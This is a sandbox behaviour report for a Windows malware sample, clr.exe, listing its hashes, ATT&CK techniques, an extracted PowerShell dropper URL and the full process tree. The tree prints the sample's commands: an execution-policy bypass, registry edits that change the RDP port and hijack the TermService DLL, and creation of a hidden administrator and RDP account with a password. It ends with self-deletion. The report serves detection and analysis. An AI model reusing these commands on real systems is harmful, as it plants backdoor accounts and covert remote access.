8779c8ac97c45254bc243e2ee79b436d1a96bc56885dcaa72c4837790b2071fc

Analysis

max time kernel
150s
max time network
49s
platform
windows10_x64
resource
win10v20210408
submitted
24-05-2021 19:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

clr.exe
Size

6.0MB
MD5

1e9f45329ffece31382bb884367f58df
SHA1

52d3d55364d8c4d350231d38bfe6eb156cf8473f
SHA256

8779c8ac97c45254bc243e2ee79b436d1a96bc56885dcaa72c4837790b2071fc
SHA512

12272d5f20c42764992420aa1a178b16d7ef1873f2c9619bd8ac16e0eb9a0067a08a9d70863c1d3e95dd4a2aa19c081ae0baabaf3431f5068ea7191c8f4d6c62

Score

10^/10

persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x000600000001ab51-223.dat	upx
behavioral2/files/0x000300000001ab55-224.dat	upx

Loads dropped DLL 2 IoCs

Processes:

pid	Process
3424
3424

Drops file in Windows directory 11 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	Process
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qmrku1tf.ue2.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_b5usi21v.nmw.psm1	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe

Delays execution with timeout.exe 1 IoCs

evasion

Processes:

timeout.exe

pid	Process
5056	timeout.exe

Modifies data under HKEY_USERS 46 IoCs

Processes:

powershell.exeWMIC.exeWMIC.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
628	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exepowershell.exe

pid	Process
1616	powershell.exe
1616	powershell.exe
1616	powershell.exe
1780	powershell.exe
1780	powershell.exe
1780	powershell.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
2216	powershell.exe
2216	powershell.exe
2216	powershell.exe
1236	taskmgr.exe
2960	powershell.exe
2960	powershell.exe
2960	powershell.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1616	powershell.exe
1616	powershell.exe
1616	powershell.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
4808	powershell.exe
4808	powershell.exe
4808	powershell.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid	Process
1236	taskmgr.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid	Process
604
604

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exetaskmgr.exepowershell.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1236	taskmgr.exe
Token: SeSystemProfilePrivilege	1236	taskmgr.exe
Token: SeCreateGlobalPrivilege	1236	taskmgr.exe
Token: SeIncreaseQuotaPrivilege	1780	powershell.exe
Token: SeSecurityPrivilege	1780	powershell.exe
Token: SeTakeOwnershipPrivilege	1780	powershell.exe
Token: SeLoadDriverPrivilege	1780	powershell.exe
Token: SeSystemProfilePrivilege	1780	powershell.exe
Token: SeSystemtimePrivilege	1780	powershell.exe
Token: SeProfSingleProcessPrivilege	1780	powershell.exe
Token: SeIncBasePriorityPrivilege	1780	powershell.exe
Token: SeCreatePagefilePrivilege	1780	powershell.exe
Token: SeBackupPrivilege	1780	powershell.exe
Token: SeRestorePrivilege	1780	powershell.exe
Token: SeShutdownPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeSystemEnvironmentPrivilege	1780	powershell.exe
Token: SeRemoteShutdownPrivilege	1780	powershell.exe
Token: SeUndockPrivilege	1780	powershell.exe
Token: SeManageVolumePrivilege	1780	powershell.exe
Token: 33	1780	powershell.exe
Token: 34	1780	powershell.exe
Token: 35	1780	powershell.exe
Token: 36	1780	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeIncreaseQuotaPrivilege	2216	powershell.exe
Token: SeSecurityPrivilege	2216	powershell.exe
Token: SeTakeOwnershipPrivilege	2216	powershell.exe
Token: SeLoadDriverPrivilege	2216	powershell.exe
Token: SeSystemProfilePrivilege	2216	powershell.exe
Token: SeSystemtimePrivilege	2216	powershell.exe
Token: SeProfSingleProcessPrivilege	2216	powershell.exe
Token: SeIncBasePriorityPrivilege	2216	powershell.exe
Token: SeCreatePagefilePrivilege	2216	powershell.exe
Token: SeBackupPrivilege	2216	powershell.exe
Token: SeRestorePrivilege	2216	powershell.exe
Token: SeShutdownPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeSystemEnvironmentPrivilege	2216	powershell.exe
Token: SeRemoteShutdownPrivilege	2216	powershell.exe
Token: SeUndockPrivilege	2216	powershell.exe
Token: SeManageVolumePrivilege	2216	powershell.exe
Token: 33	2216	powershell.exe
Token: 34	2216	powershell.exe
Token: 35	2216	powershell.exe
Token: 36	2216	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeIncreaseQuotaPrivilege	2960	powershell.exe
Token: SeSecurityPrivilege	2960	powershell.exe
Token: SeTakeOwnershipPrivilege	2960	powershell.exe
Token: SeLoadDriverPrivilege	2960	powershell.exe
Token: SeSystemProfilePrivilege	2960	powershell.exe
Token: SeSystemtimePrivilege	2960	powershell.exe
Token: SeProfSingleProcessPrivilege	2960	powershell.exe
Token: SeIncBasePriorityPrivilege	2960	powershell.exe
Token: SeCreatePagefilePrivilege	2960	powershell.exe
Token: SeBackupPrivilege	2960	powershell.exe
Token: SeRestorePrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeSystemEnvironmentPrivilege	2960	powershell.exe
Token: SeRemoteShutdownPrivilege	2960	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	Process
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	Process
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe
1236	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

clr.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	Process	procid_target
PID 636 wrote to memory of 1616	636	clr.exe	75
PID 636 wrote to memory of 1616	636	clr.exe	75
PID 1616 wrote to memory of 1500	1616	powershell.exe	79
PID 1616 wrote to memory of 1500	1616	powershell.exe	79
PID 1500 wrote to memory of 1164	1500	csc.exe	80
PID 1500 wrote to memory of 1164	1500	csc.exe	80
PID 1616 wrote to memory of 1780	1616	powershell.exe	83
PID 1616 wrote to memory of 1780	1616	powershell.exe	83
PID 1616 wrote to memory of 2216	1616	powershell.exe	88
PID 1616 wrote to memory of 2216	1616	powershell.exe	88
PID 1616 wrote to memory of 2960	1616	powershell.exe	90
PID 1616 wrote to memory of 2960	1616	powershell.exe	90
PID 1616 wrote to memory of 3424	1616	powershell.exe	93
PID 1616 wrote to memory of 3424	1616	powershell.exe	93
PID 1616 wrote to memory of 628	1616	powershell.exe	94
PID 1616 wrote to memory of 628	1616	powershell.exe	94
PID 1616 wrote to memory of 2852	1616	powershell.exe	95
PID 1616 wrote to memory of 2852	1616	powershell.exe	95
PID 1616 wrote to memory of 2156	1616	powershell.exe	96
PID 1616 wrote to memory of 2156	1616	powershell.exe	96
PID 2156 wrote to memory of 2960	2156	net.exe	97
PID 2156 wrote to memory of 2960	2156	net.exe	97
PID 1616 wrote to memory of 2088	1616	powershell.exe	98
PID 1616 wrote to memory of 2088	1616	powershell.exe	98
PID 2088 wrote to memory of 3252	2088	cmd.exe	99
PID 2088 wrote to memory of 3252	2088	cmd.exe	99
PID 3252 wrote to memory of 3556	3252	cmd.exe	100
PID 3252 wrote to memory of 3556	3252	cmd.exe	100
PID 3556 wrote to memory of 3964	3556	net.exe	101
PID 3556 wrote to memory of 3964	3556	net.exe	101
PID 1616 wrote to memory of 1780	1616	powershell.exe	102
PID 1616 wrote to memory of 1780	1616	powershell.exe	102
PID 1780 wrote to memory of 4072	1780	cmd.exe	103
PID 1780 wrote to memory of 4072	1780	cmd.exe	103
PID 4072 wrote to memory of 2172	4072	cmd.exe	104
PID 4072 wrote to memory of 2172	4072	cmd.exe	104
PID 2172 wrote to memory of 2852	2172	net.exe	105
PID 2172 wrote to memory of 2852	2172	net.exe	105
PID 3948 wrote to memory of 4128	3948	cmd.exe	109
PID 3948 wrote to memory of 4128	3948	cmd.exe	109
PID 4128 wrote to memory of 4148	4128	net.exe	110
PID 4128 wrote to memory of 4148	4128	net.exe	110
PID 4168 wrote to memory of 4208	4168	cmd.exe	113
PID 4168 wrote to memory of 4208	4168	cmd.exe	113
PID 4208 wrote to memory of 4228	4208	net.exe	114
PID 4208 wrote to memory of 4228	4208	net.exe	114
PID 4248 wrote to memory of 4288	4248	cmd.exe	117
PID 4248 wrote to memory of 4288	4248	cmd.exe	117
PID 4288 wrote to memory of 4308	4288	net.exe	118
PID 4288 wrote to memory of 4308	4288	net.exe	118
PID 4328 wrote to memory of 4368	4328	cmd.exe	121
PID 4328 wrote to memory of 4368	4328	cmd.exe	121
PID 4368 wrote to memory of 4388	4368	net.exe	122
PID 4368 wrote to memory of 4388	4368	net.exe	122
PID 4408 wrote to memory of 4448	4408	cmd.exe	125
PID 4408 wrote to memory of 4448	4408	cmd.exe	125
PID 4448 wrote to memory of 4468	4448	net.exe	126
PID 4448 wrote to memory of 4468	4448	net.exe	126
PID 4488 wrote to memory of 4528	4488	cmd.exe	129
PID 4488 wrote to memory of 4528	4488	cmd.exe	129
PID 4528 wrote to memory of 4548	4528	net.exe	130
PID 4528 wrote to memory of 4548	4528	net.exe	130
PID 4584 wrote to memory of 4636	4584	cmd.exe	133
PID 4584 wrote to memory of 4636	4584	cmd.exe	133

C:\Users\Admin\AppData\Local\Temp\clr.exe
"C:\Users\Admin\AppData\Local\Temp\clr.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:636
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pq0zcthn\pq0zcthn.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1500
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE8FE.tmp" "c:\Users\Admin\AppData\Local\Temp\pq0zcthn\CSCD483745B2BE84913B93B73582E13DE16.TMP"
      4⤵
      PID:1164
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2216
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2960
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:3424
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Modifies registry key
    PID:628
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:2852
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:2960
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2088
  - - C:\Windows\system32\cmd.exe
      cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3252
    - - C:\Windows\system32\net.exe
        
        net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3556
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        6⤵
        
        PID:3964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\system32\cmd.exe
      cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4072
    - - C:\Windows\system32\net.exe
        
        net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2172
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        6⤵
        
        PID:2852
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    3⤵
    PID:4964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
    3⤵
    PID:4980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /C timeout -n t& del C:\Users\Admin\AppData\Local\Temp\clr.exe
  2⤵
  PID:5004
- - C:\Windows\system32\timeout.exe
    timeout -n t
    3⤵
    - Delays execution with timeout.exe
    PID:5056

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1236

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3948
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:4148

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc llTPxxar /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4168
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc llTPxxar /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc llTPxxar /add
    3⤵
    PID:4228

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4248
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:4308

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4328
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    3⤵
    PID:4388

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:4408
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:4468

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc llTPxxar
1⤵
- Suspicious use of WriteProcessMemory
PID:4488
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc llTPxxar
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc llTPxxar
    3⤵
    PID:4548

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:4584
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Modifies data under HKEY_USERS
  PID:4636

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
